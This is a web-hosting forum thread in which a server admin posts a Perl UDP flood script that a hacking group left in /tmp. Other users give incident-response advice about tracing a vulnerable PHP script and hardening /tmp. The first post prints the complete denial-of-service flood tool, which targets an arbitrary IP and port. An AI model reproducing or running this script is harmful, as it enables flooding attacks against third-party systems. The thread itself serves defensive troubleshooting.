Script in tmp made by Hacker

jeroman8

Well-Known Member
Mar 14, 2003
410
0
166
I had a script made by a hacking team called UMHCreW in my TMP folder.
Anyone know what it is ?

Is it ok to remove/delete ALL files in the tmp folder or will this
screw something up ?
I have old files and a lot of folders and crazy files in there.

Here's the script...


#!/usr/bin/perl
#####################################################
# Simple but agressive udp flood.
#
# gr33ts: Amaz1ng^ RUBIN1,Caffeine,cyberboki, etc.
#
# lemurian from UMHCreW @ eu.undernet.org #deadworld
######################################################

use Socket;

[email protected];

if ($ARGC !=3) {
printf "UMHCreW 2004\n";
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "Simpe but Agressive udp flood - [email protected]\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,437
33
473
Go on, have a guess
Well, that's just the symptoms of a problem. What are is the ownership of that file? If it's nobody:nobody, then you have a vulnerable PHP script on your server and you need to track it down and either fix or remove it. If it's owned by a user, you can then suspend their account while you investigate further. You should also make sure that the script is not actually running on your server (i.e. look for it having open ports) and then definitely move it somewhere safe. Simply deleting it first before investigating further is not necessarily the best thing to do. Moving it, or tar'ing it up and preserving the ownership should be first.
 

jeroman8

Well-Known Member
Mar 14, 2003
410
0
166
yes it's nobody that owns the file

How can I track which php script does this ?
Just some basic stuff so I can go from there would be nice :)
 

GOT

Get Proactive!
PartnerNOC
Apr 8, 2003
1,763
318
363
Chesapeake, VA
cPanel Access Level
DataCenter Provider
Short of running php as suexec you'll really not be able to track it down, save for seaching every php file and even that may not turn it up.

You cannot prevent php from writing to the /tmp directory, so what you need to do is make it so that people cannot execute programs from there. Remove access to compilers. Security for your server needs to be taken very seriously (not saying that you are not) and you should either spend some time reading up on how to secure your linux server, or contract it to one of the several reputable server admins hanging around.
 

jeroman8

Well-Known Member
Mar 14, 2003
410
0
166
Thank you!

Is it ok to delete all old tmp files ?
They are just there right, leftovers...